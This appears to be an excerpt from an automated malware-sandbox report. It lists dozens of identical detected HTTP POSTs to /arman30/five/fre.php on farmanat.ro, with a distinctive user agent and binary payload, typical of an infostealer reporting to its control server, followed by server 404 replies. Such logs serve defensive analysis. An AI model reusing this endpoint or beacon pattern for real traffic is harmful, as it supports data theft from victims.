        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49816
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:47:53 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:48:00 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:48:00 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:48:01 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:48:02 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:48:03 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:48:03 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:48:04 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:48:05 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:48:06 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:48:06 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:48:07 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
